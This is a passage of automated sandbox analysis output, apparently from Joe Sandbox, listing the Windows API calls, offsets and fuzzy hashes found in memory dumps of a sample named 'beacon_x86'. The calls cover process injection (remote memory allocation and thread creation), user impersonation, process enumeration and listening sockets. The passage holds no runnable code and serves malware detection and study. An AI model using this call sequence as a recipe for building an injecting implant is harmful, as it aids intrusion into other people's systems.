            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
            • Part of subcall function 00D6DA37: _malloc.LIBCMT ref: 00D6DA5E
            • Part of subcall function 00D6DA37: _memset.LIBCMT ref: 00D6DA8C
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$AllocateHeap_memset
          • String ID:
          • API String ID: 3655941445-0
          • Opcode ID: 45f6754b8125ea83e4ecc507940837133310b93bcecf199b38bdf54ccdfe09f1
          • Instruction ID: 6bfce6c982c1f7bfdc1da07806481ff19b4155fa932617db4322f7484c3fbd16
          • Opcode Fuzzy Hash: 45f6754b8125ea83e4ecc507940837133310b93bcecf199b38bdf54ccdfe09f1
          • Instruction Fuzzy Hash: DFF0A071E44361EBE720BFA0AC42F8A7BA5EF05720F02081BF418DB2C2DA60088187B5
          APIs
          • _malloc.LIBCMT ref: 00D72EFE
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: AllocateHeap_malloc
          • String ID:
          • API String ID: 501242067-0
          • Opcode ID: 770a5737fa1c2baebb51fc1048b2bd86ee1b0969124dc220f3e5ed95a16c1eaa
          • Instruction ID: 0ff5f4701e55d27c25babaa7c6418e27156539a1d97ae2de7537121c3109e276
          • Opcode Fuzzy Hash: 770a5737fa1c2baebb51fc1048b2bd86ee1b0969124dc220f3e5ed95a16c1eaa
          • Instruction Fuzzy Hash: 9DE04F7220C6014FDB288F2DF841616B7F1DB84320B64CE3EE09EC7384EA34D4818B24
          APIs
          • VirtualProtect.KERNELBASE(00000000,00000000,00000020,00000004,00000000), ref: 00D2A9C8
          Memory Dump Source
          • Source File: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_3_d20000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID: ProtectVirtual
          • String ID:
          • API String ID: 544645111-0
          • Opcode ID: c8269323ef5a83853f531880be9aa38fe7d1b7683f8a152e64d76accc3a7c159
          • Instruction ID: 8d11adec65b69991b54f6657dbdeb0756e1fd4edd963f9c2963b77854e7b9189
          • Opcode Fuzzy Hash: c8269323ef5a83853f531880be9aa38fe7d1b7683f8a152e64d76accc3a7c159
          • Instruction Fuzzy Hash: B9E01A3150060DEBDB18CE49E848BAA33AAEB48715F458159FD1846180D771EE90CFB2
          APIs
          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00D793C6,?), ref: 00D7969F
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateHeap
          • String ID:
          • API String ID: 10892065-0
          • Opcode ID: 8a49b8f029fa038cd20e7c0d831e851941ecee2e0192c253f658302655be86d5
          • Instruction ID: a35e2ed5f6f25b585451f9ec5e7325d9e1e044da5402d224d0d641135ff4bf7b
          • Opcode Fuzzy Hash: 8a49b8f029fa038cd20e7c0d831e851941ecee2e0192c253f658302655be86d5
          • Instruction Fuzzy Hash: 7BD05E725503045FEB106F757C08B263BDCD784395F148536B94CCA260F774D540C624
          APIs
          • VirtualAlloc.KERNELBASE(00000000,?,00003000,00D29DE6,?,00D29DE6,75920A60), ref: 00D2A98D
          Memory Dump Source
          • Source File: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_3_d20000_beacon_x86.jbxd
          Yara matches
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
          • Instruction ID: 73b0acd5ecc917024899f9c454225b579d13465c1c4a18c4341a5eff39498045
          • Opcode Fuzzy Hash: 06db9e082881e3a7de2518e710500035fed678b226e83921418e753830c2cfca
          • Instruction Fuzzy Hash: 2831DC70A00109AFCB08CF99D894BAEB7B1FF88714F15C159E959AB354D730EA91CF91
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Sleep
          • String ID:
          • API String ID: 3472027048-0
          • Opcode ID: 630afa755b89f7b2e6cb0125680828b0c2d97d48853a7098bfa46fdba1929345
          • Instruction ID: 152a9857a4b91f93e1044833a745cc6512d99e483c2258ed95e7c9fb90902414
          • Opcode Fuzzy Hash: 630afa755b89f7b2e6cb0125680828b0c2d97d48853a7098bfa46fdba1929345
          • Instruction Fuzzy Hash: 17F0FE31610306EBEB149F66FC0AB287BA5EF44314F08451BE915C9261DB76D4908A76
          APIs
            • Part of subcall function 00401805: GetTickCount.KERNEL32 ref: 0040180B
            • Part of subcall function 00401805: sprintf.MSVCRT ref: 00401875
            • Part of subcall function 00401805: CreateThread.KERNELBASE ref: 004018A9
          • Sleep.KERNELBASE(?,00401386,?,0000165A,00401386), ref: 00402A09
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: CountCreateSleepThreadTicksprintf
          • String ID:
          • API String ID: 2384577035-0
          • Opcode ID: edd1f4d74f08d7a86e4d3b4e7046a0930fe99e0aed8f677c13492f49e07a44d4
          • Instruction ID: afb1948537415933b36a4db080653cee2dd393a0534abb60b1e029c31af3872c
          • Opcode Fuzzy Hash: edd1f4d74f08d7a86e4d3b4e7046a0930fe99e0aed8f677c13492f49e07a44d4
          • Instruction Fuzzy Hash: 90D05EB1408704AAC6003FB5C90A71ABAA8AB05351F01063CF9C1251E1DF7950108B7B
          APIs
          • _malloc.LIBCMT ref: 00D64237
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • _memset.LIBCMT ref: 00D64243
            • Part of subcall function 00D606CB: _malloc.LIBCMT ref: 00D606D1
            • Part of subcall function 00D6071B: htonl.WS2_32(00000000), ref: 00D60721
          • _strncmp.LIBCMT ref: 00D64292
          • GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 00D642A0
            • Part of subcall function 00D77722: __lock.LIBCMT ref: 00D77740
            • Part of subcall function 00D77722: ___sbh_find_block.LIBCMT ref: 00D7774B
            • Part of subcall function 00D77722: ___sbh_free_block.LIBCMT ref: 00D7775A
            • Part of subcall function 00D77722: HeapFree.KERNEL32(00000000,?,00D925A0,0000000C,00D7988B,00000000,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D7778A
            • Part of subcall function 00D77722: GetLastError.KERNEL32(?,00D8519D,00000004,00D92A60,0000000C,00D80868,?,?,00000000,00000000,00000000,?,00D7C749,00000001,00000214), ref: 00D7779B
          • FindFirstFileA.KERNEL32(00000000,?), ref: 00D642D1
          • GetLastError.KERNEL32 ref: 00D642DE
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D6432A
          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D6433A
          • FindNextFileA.KERNEL32(00000000,00000010), ref: 00D643CD
          • FindClose.KERNEL32(00000000), ref: 00D643DC
            • Part of subcall function 00D60825: _vwprintf.LIBCMT ref: 00D6082F
            • Part of subcall function 00D60825: _vswprintf_s.LIBCMT ref: 00D60853
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
          • String ID:
          • API String ID: 2804257087-0
          • Opcode ID: 367741937191fe788a624aa3e96e89a7853a88b2fdab5ad84866b0e513a4ffb9
          • Instruction ID: fe05d9d347cc95e75935afcd7a1088275bc974c6e5c7adcce240314491dcc90a
          • Opcode Fuzzy Hash: 367741937191fe788a624aa3e96e89a7853a88b2fdab5ad84866b0e513a4ffb9
          • Instruction Fuzzy Hash: 735121B2904229ABDB10EBE5DC46EFF7BBCEF48714F044526F515E2181FA38994487B1
          APIs
          • _memset.LIBCMT ref: 00D69504
            • Part of subcall function 00D606CB: _malloc.LIBCMT ref: 00D606D1
          • GetCurrentProcess.KERNEL32 ref: 00D6954F
          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00D69583
          • Process32First.KERNEL32(00000000,?), ref: 00D695A5
            • Part of subcall function 00D6071B: htonl.WS2_32(00000000), ref: 00D60721
          • Process32Next.KERNEL32(00000000,00000128), ref: 00D69688
            • Part of subcall function 00D69477: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00D69484
          • ProcessIdToSessionId.KERNEL32(?,?,00000000,?,00000002,00000000), ref: 00D69629
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Process$Process32$CreateCurrentFirstNextOpenSessionSnapshotTokenToolhelp32_malloc_memsethtonl
          • String ID: x86
          • API String ID: 3674674043-2105985432
          • Opcode ID: 447340cae775b3053d4473118a7423672c073c893f5ed4e321517c6ba13d85f6
          • Instruction ID: 5abfffbe9ec49282b2b50f55b9c4b48f60a43a15d9cf1807301c8ed29df4eb7f
          • Opcode Fuzzy Hash: 447340cae775b3053d4473118a7423672c073c893f5ed4e321517c6ba13d85f6
          • Instruction Fuzzy Hash: 6D51647290420DAFDF11ABE4DC56AEFBBBCDF04324F144066F504E2191EA35DA458BB1
          APIs
          • _malloc.LIBCMT ref: 00D6971B
            • Part of subcall function 00D777FF: __FF_MSGBANNER.LIBCMT ref: 00D77822
            • Part of subcall function 00D777FF: __NMSG_WRITE.LIBCMT ref: 00D77829
            • Part of subcall function 00D777FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00D9EFA0,?,00D6006E,00004008), ref: 00D77876
          • __snprintf.LIBCMT ref: 00D6972C
          • FindFirstFileA.KERNEL32(00000000,00D640C9,?,00D697FD,00D640C9,?,Function_0000404D), ref: 00D69739
            • Part of subcall function 00D77722: __lock.LIBCMT ref: 00D77740
            • Part of subcall function 00D77722: ___sbh_find_block.LIBCMT ref: 00D7774B
            • Part of subcall function 00D77722: ___sbh_free_block.LIBCMT ref: 00D7775A
            • Part of subcall function 00D77722: HeapFree.KERNEL32(00000000,?,00D925A0,0000000C,00D7988B,00000000,00D92700,0000000C,00D798C5,?,?,?,00D8519D,00000004,00D92A60,0000000C), ref: 00D7778A
            • Part of subcall function 00D77722: GetLastError.KERNEL32(?,00D8519D,00000004,00D92A60,0000000C,00D80868,?,?,00000000,00000000,00000000,?,00D7C749,00000001,00000214), ref: 00D7779B
          • _malloc.LIBCMT ref: 00D69778
          • __snprintf.LIBCMT ref: 00D6978D
            • Part of subcall function 00D696D1: _malloc.LIBCMT ref: 00D696DC
            • Part of subcall function 00D696D1: __snprintf.LIBCMT ref: 00D696F0
          • FindNextFileA.KERNEL32(000000FF,00D640C9,?,?,?,?,?,?,?), ref: 00D697BA
          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 00D697C7
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
          • String ID:
          • API String ID: 1254174322-0
          • Opcode ID: 7ae800f8f7ca239d697f2c5c2412b7c2d27ae9740c1b11ea2a813ecb56f58f33
          • Instruction ID: 9bf500bef607e3865a486011243465e94abff7c89eb587c3166d91fb8b6c0a1b
          • Opcode Fuzzy Hash: 7ae800f8f7ca239d697f2c5c2412b7c2d27ae9740c1b11ea2a813ecb56f58f33
          • Instruction Fuzzy Hash: E621D432500208BFDF106F65DC46EAF7F6DEF407A0F188424F908AA251EB719D119BB0
          APIs
          • IsDebuggerPresent.KERNEL32 ref: 00D831AD
          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D831C2
          • UnhandledExceptionFilter.KERNEL32(00D8AC2C), ref: 00D831CD
          • GetCurrentProcess.KERNEL32(C0000409), ref: 00D831E9
          • TerminateProcess.KERNEL32(00000000), ref: 00D831F0
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
          • String ID: o#{#
          • API String ID: 2579439406-379982271
          • Opcode ID: 2eab42f065c8d9b406cb0d21b1cf4b37558d13e6cb7d25a63a30f4a5b4d94363
          • Instruction ID: e821463a461864af7ea79be3aa11b57acf09e0b635b9c905ee88f659ca294892
          • Opcode Fuzzy Hash: 2eab42f065c8d9b406cb0d21b1cf4b37558d13e6cb7d25a63a30f4a5b4d94363
          • Instruction Fuzzy Hash: E021CDB4822304AFD710DF68FE896543BB8FB48724F12101BEA08C6360E7B459868F35
          APIs
          • htonl.WS2_32 ref: 00D676B6
          • htons.WS2_32(?), ref: 00D676C6
          • socket.WS2_32(00000002,00000002,00000000), ref: 00D676DC
          • closesocket.WS2_32(00000000), ref: 00D676E9
          • bind.WS2_32(00000000,?,00000010), ref: 00D67717
          • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00D6772E
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: bindclosesockethtonlhtonsioctlsocketsocket
          • String ID:
          • API String ID: 3910169428-0
          • Opcode ID: 6239602cab72869170fbda90b462baf68007d31cc28af6a69a1f951ee9adf7f4
          • Instruction ID: f6cf145709da2ff18871a9459446b7c9c2d5edf4dfaf19a296e47a72fb835b3e
          • Opcode Fuzzy Hash: 6239602cab72869170fbda90b462baf68007d31cc28af6a69a1f951ee9adf7f4
          • Instruction Fuzzy Hash: 77118271E04318ABD710ABF89C86FAEB7ACDF08328F104576F615E61D2E6748A448779
          APIs
          • socket.WS2_32(00000002,00000001,00000000), ref: 00D675CF
          • htons.WS2_32(?), ref: 00D675EB
          • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00D67604
          • closesocket.WS2_32(00000000), ref: 00D6760F
          • bind.WS2_32(00000000,?,00000010), ref: 00D6761D
          • listen.WS2_32(00000000,?), ref: 00D6762B
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: bindclosesockethtonsioctlsocketlistensocket
          • String ID:
          • API String ID: 1767165869-0
          • Opcode ID: 684e3fab20465ebc5c2bc51e182806f0ed24c761cacec87125c3c9889a1dbabd
          • Instruction ID: 20f69773217e604c9ca90e1c4ea047b0c84273bbea2ff7ab96d31cb5c695346c
          • Opcode Fuzzy Hash: 684e3fab20465ebc5c2bc51e182806f0ed24c761cacec87125c3c9889a1dbabd
          • Instruction Fuzzy Hash: 0C01753560462CB7DB22BBE88C45EEEBB29DF41764F240152F945E6191E730CA4187FA
          APIs
          • SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
          • UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
          • GetCurrentProcess.KERNEL32 ref: 00401AC8
          • TerminateProcess.KERNEL32 ref: 00401AD9
          • abort.MSVCRT ref: 00401AE2
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
          • String ID:
          • API String ID: 520269711-0
          • Opcode ID: f1735b2a21335909bc253273f0ac7d76cfe1abd3c6ccf2038b615fc4144ab68f
          • Instruction ID: 4cf10dc5dd0b46c0d15535f06df006338fe5ac01ee9545680c35680ef873d5b5
          • Opcode Fuzzy Hash: f1735b2a21335909bc253273f0ac7d76cfe1abd3c6ccf2038b615fc4144ab68f
          • Instruction Fuzzy Hash: C71104B8904701CFC700EF79E98860ABBF0BB48305F418939E98897362E774D944CF5A
          APIs
          • GetSystemTimeAsFileTime.KERNEL32 ref: 004019DF
          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 004019F0
          • GetCurrentThreadId.KERNEL32 ref: 004019F8
          • GetTickCount.KERNEL32 ref: 00401A00
          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004014B2), ref: 00401A0F
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
          • String ID:
          • API String ID: 1445889803-0
          • Opcode ID: ce9964a745ff34b1e52db9bb427ed0266c0b5c27dc7e9c3f673c87eb161a208f
          • Instruction ID: f91986c62e855f646c45f311636352fb5b7618295fe1daaf99d33dd895697f3e
          • Opcode Fuzzy Hash: ce9964a745ff34b1e52db9bb427ed0266c0b5c27dc7e9c3f673c87eb161a208f
          • Instruction Fuzzy Hash: 72112EB56093008BD710DF7AE9CC64BBBE0FB88355F150C3AE545C6720EA35D849CB96
          APIs
          • SetUnhandledExceptionFilter.KERNEL32 ref: 00401AAF
          • UnhandledExceptionFilter.KERNEL32 ref: 00401ABF
          • GetCurrentProcess.KERNEL32 ref: 00401AC8
          • TerminateProcess.KERNEL32 ref: 00401AD9
          • abort.MSVCRT ref: 00401AE2
          Memory Dump Source
          • Source File: 00000000.00000002.3890235844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.3890220060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890251384.0000000000403000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890265739.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890295487.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.3890310517.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_beacon_x86.jbxd
          Similarity
          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
          • String ID:
          • API String ID: 520269711-0
          • Opcode ID: e890205312924e3d75c916e9bd349fed97dc7cc0427307e0de22e70c0feafd3e
          • Instruction ID: 06684be4768ddce2bfe548fce248f846a3560142eb51a47cff2d5cf3969212e5
          • Opcode Fuzzy Hash: e890205312924e3d75c916e9bd349fed97dc7cc0427307e0de22e70c0feafd3e
          • Instruction Fuzzy Hash: 721117B9900701CFD700EF79E94864A7BF0BB09302F418979E94897362E774E844CF5A
          APIs
          • socket.WS2_32(00000002,00000001,00000000), ref: 00D6DDC5
          • closesocket.WS2_32(00000000), ref: 00D6DDD2
          • htons.WS2_32(?), ref: 00D6DDE3
          • bind.WS2_32(00000000,?,00000010), ref: 00D6DDFA
          • listen.WS2_32(00000000,00000078), ref: 00D6DE0B
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: bindclosesockethtonslistensocket
          • String ID:
          • API String ID: 564772725-0
          • Opcode ID: 4608418ac572ee87b4d0a36261fff936413e4078da5707b22057ec53c3953703
          • Instruction ID: 3cd7b48935b7193c558bb743db4429f43367961e4c3f10eb1bb00aafd1a1e266
          • Opcode Fuzzy Hash: 4608418ac572ee87b4d0a36261fff936413e4078da5707b22057ec53c3953703
          • Instruction Fuzzy Hash: C4F0D134E8032477DA1077B86C06BAE32299F10330F004351F9A5AA0D3D7B1C64087FA
          APIs
            • Part of subcall function 00D6CF1C: RevertToSelf.ADVAPI32(00000100,00D6D4B0,00000000,?,?,00D609A7,?,00000000,00000000,00000000,00000100,00000100), ref: 00D6CF33
          • LogonUserA.ADVAPI32(?,?,?,00000009,00000003,00D9F8A4), ref: 00D6D292
          • GetLastError.KERNEL32 ref: 00D6D29C
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671C2
            • Part of subcall function 00D671BC: _malloc.LIBCMT ref: 00D671D2
            • Part of subcall function 00D606CB: _malloc.LIBCMT ref: 00D606D1
            • Part of subcall function 00D60825: _vwprintf.LIBCMT ref: 00D6082F
            • Part of subcall function 00D60825: _vswprintf_s.LIBCMT ref: 00D60853
            • Part of subcall function 00D60864: _memset.LIBCMT ref: 00D60872
          • ImpersonateLoggedOnUser.ADVAPI32 ref: 00D6D2B6
          • GetLastError.KERNEL32 ref: 00D6D2C0
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: _malloc$ErrorLastUser$ImpersonateLoggedLogonRevertSelf_memset_vswprintf_s_vwprintf
          • String ID:
          • API String ID: 3063602088-0
          • Opcode ID: ecc5bfd60b4ca226a13278e4355baab0a4dc3c6161ec9c82f8de0c8d393e3571
          • Instruction ID: 8dc69ce27b25d33ea51fbcfffb789040ad977d7e642e3e93be4cd5d144bdd22f
          • Opcode Fuzzy Hash: ecc5bfd60b4ca226a13278e4355baab0a4dc3c6161ec9c82f8de0c8d393e3571
          • Instruction Fuzzy Hash: DE3152B2904308BFEF41BFA4ED46EAB3FA9EB05745F144036F904E52A1E73589149BB1
          APIs
          • GetCurrentProcess.KERNEL32(00000000,00D655ED,?,?,?,00D65A04,00000000,00000000,00000000,?,00000000,00D655ED,00000000,00000000,00000000), ref: 00D6C369
          • NtAllocateVirtualMemory.NTDLL(?,00000000,00000000,?,00003000,00000000), ref: 00D6C384
          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000000,00000000,00D655ED,?,?,?,00D65A04,00000000,00000000,00000000,?,00000000,00D655ED), ref: 00D6C3CA
          • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000000,00000000,00D655ED,?,?,?,00D65A04,00000000,00000000,00000000,?,00000000), ref: 00D6C3D5
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: Virtual$Alloc$AllocateCurrentMemoryProcess
          • String ID:
          • API String ID: 3902775219-0
          • Opcode ID: f3225af02601ea7639aff63889f2da5ca9a95b9bb0ebc04242fcfe17363879df
          • Instruction ID: c4146535a3e0c2c72f8666e04b08412e9f79a830296df52b2bf5e68025645331
          • Opcode Fuzzy Hash: f3225af02601ea7639aff63889f2da5ca9a95b9bb0ebc04242fcfe17363879df
          • Instruction Fuzzy Hash: D9214AB5860304EFDB29DF49EC498BA3BB9E755760B24911AF486D2320E730AE40CB71
          APIs
          • GetCurrentProcess.KERNEL32(?,?,?,00D65865,00000000,00000000,00000000,?,00D65284,00000000,00000000,00000000,?,00D655ED,00000000,00000000), ref: 00D6C6A2
          • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00D6C6C6
          • CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D6C715
          • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D6C720
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: CreateThread$CurrentProcessRemote
          • String ID:
          • API String ID: 3122335635-0
          • Opcode ID: 9e1e7b97a0420c0161f701f64575aea9cd948f5a0187209609533c6fb648fb43
          • Instruction ID: c32b52289e240b3b334425c8aa2b48672989ca711fcbc3eb3b0321429d4d0c77
          • Opcode Fuzzy Hash: 9e1e7b97a0420c0161f701f64575aea9cd948f5a0187209609533c6fb648fb43
          • Instruction Fuzzy Hash: 8C115EB1522314EBCF359F95DD898BA7F69EB15790B286016F889C6220C7318E80DFB5
          APIs
          • GetCurrentProcess.KERNEL32(?,?,?,00D65A90,00000000,00000000,00000000,?,00000000,00D655ED,00000000,00000000,00000000), ref: 00D6C421
          • NtProtectVirtualMemory.NTDLL(?,?,00000000,00000000,00D655ED), ref: 00D6C43B
          • VirtualProtect.KERNEL32(00000000,00000000,00000000,00D655ED,?,?,?,00D65A90,00000000,00000000,00000000), ref: 00D6C47F
          • VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000000,00D655ED,?,?,?,00D65A90,00000000,00000000,00000000), ref: 00D6C48A
          Memory Dump Source
          • Source File: 00000000.00000002.3890568385.0000000000D60000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_d60000_beacon_x86.jbxd
          Similarity
          • API ID: ProtectVirtual$CurrentMemoryProcess
          • String ID:
          • API String ID: 261991438-0
          • Opcode ID: 955326eee837c9f927e054387bf5b9ddf14571f0630fd128837ef7ecf955bbd9
